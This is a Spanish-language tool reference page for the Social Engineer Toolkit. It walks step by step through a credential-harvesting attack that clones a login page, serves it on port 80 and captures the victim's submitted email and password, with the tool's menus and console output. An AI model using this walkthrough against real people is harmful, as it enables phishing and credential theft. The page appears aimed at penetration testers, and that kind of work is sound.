Menu

SET-es




SET

Fase(s):

Principal: Descubrimiento.
Secundaria: N/A.

Descripción:

SET, por sus siglas en ingles Social Engineer Toolkit, es una herramienta cuyo fin principal es el ayudar a explotar vulnerabilidades de una aplicación Web con base en el "factor humano". Utiliza técnicas de ingeniería social para lograr ataques exitosos.

Objetivo:

  • Obtener información sensible de un usuario.
  • Obtener acceso al equipo de un usuario.

Funcionalidades:

Tecnologías soportadas: Aplicaciones Web (HTTP).

Modo de ejecución: Activo.

Obtener información sensible de un usuario.

  • Ofrece distintos tipos de ataque para obtener información sensible de un usuario como credenciales de acceso.
  • Ofrece los siguientes tipos de ataques sociales: Java Applet Attack Method, Metasploit Browser Exploit Method, Credential Harvester Attack Method, Tabnabbing Attack Method, Man Left in the Mtiddle Attack Method, Web Jacking Attack Method , por mencionar algunos.

Obtener acceso al equipo un usuario.

  • Permite obtener acceso a la máquina de un usuario permitiendo ejecutar comandos de sistema con el fin de obtener información, crear puertas traseras, entre otros.

Reportes:
Resultados exportables: X

Uso básico:

Realizar un ataque de clonación de un sitio Web para obtener credenciales de acceso de un usuario. El siguiente comando inicia el menú principal de la herramienta.

./set


La herramienta lanza el menú principal, a partir de aquí todo consiste en seleccionar una opción e introducir datos que se soliciten, como son: ip local, URL de sitio a clonar, mensajes informativos, por mencionar algunos.

Elegir la opción número uno Social-Engineering Attacks.

Select from the menu: 1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About 99) Exit the Social-Engineer Toolkit


A continuación elegir la opción número dos Website Attack Vectors.

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.


Ahora para recolectar credenciales de un usuario elegir el vector de ataque Credential Harvester Attack Method, opción número tres.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Mtiddle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate 99) Return to Main Menu


Elija el modo Site Cloner, opción número dos, esta opción permite indicar cualquier página Web que al usuario le resulte familiar, con el fin de abusar de la confianza que tenga el usuario en el sitio clonado.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu


Proporcionar la IP de la maquina donde la herramienta regresará las credenciales que logre capturar.

set:Webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a Website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:Webattack> IP address for the POST back in Harvester/Tabnabbing: 127.0.0.1


Proporcionar la URL de la página que se clonará para recolectar las credenciales del usuario víctima.

[-] Example: http://www.thisisafakesite.com
set:Webattack> Enter the url to clone: URL_A_CLONAR.


La herramienta comienza el proceso para clonación de la página Web que se indicó en el paso anterior.

[*] Cloning the Website: https://login.url.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a Website.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80


En caso de que el servicio de Apache este corriendo, la herramienta solicita confirmación para detenerlo. Detiene el servicio Apache, pública la página Web que clono en el puerto 80 y queda en espera de que una usuario accese a a sito fraudulento.

[*] Information will be displayed to you as it arrives below:
[*] Looks like the Web_server can't bind to 80. Are you running Apache?
Do you want to attempt to disable Apache? [y/n]: y
* Stopping Web server
apache2
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
... waiting
[ OK ]
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.


La URL de explotación se conforma de la siguiente manera: http:// IP_PROPORCIONADA/index.html

Cuando la herramienta identifica una conexión a la página que fue clonada, muestra un aviso en la consola.

IP_USUARIO - - [14/Nov/2013 16:43:15] "GET / HTTP/1.1" 200 -


El usuario que ingresa a la página, llena el formulario de acceso con sus credenciales y presiona el botón de para ingresar. Entonces la herramienta captura el request HTTP y lo muestra en consola.

[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVpgu8gq
PARAM: display=
PARAM: enable_profile_selector=
PARAM: legacy_return=1
PARAM: profile_selector_ids=
PARAM: trynum=1
PARAM: timezone=360
PARAM: lgnrnd=144204_hbWo
PARAM: lgnjs=1384469624
POSSIBLE USERNAME FIELD FOUND: email= usuario@hotmail.com
POSSIBLE PASSWORD FIELD FOUND: pass= micontrasena12345
PARAM: persistent=1
PARAM: default_persistent=0
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


Finalmente detenemos la página Web clonada con la combinación de teclas Ctrl + C.

Referencias:

Liga: https://www.trustedsec.com/downloads/social-engineer-toolkit/
Autor (es): David Kennedy
Contacto: irc.freenode.net canal #setoolkit
Licencia: BSD licensing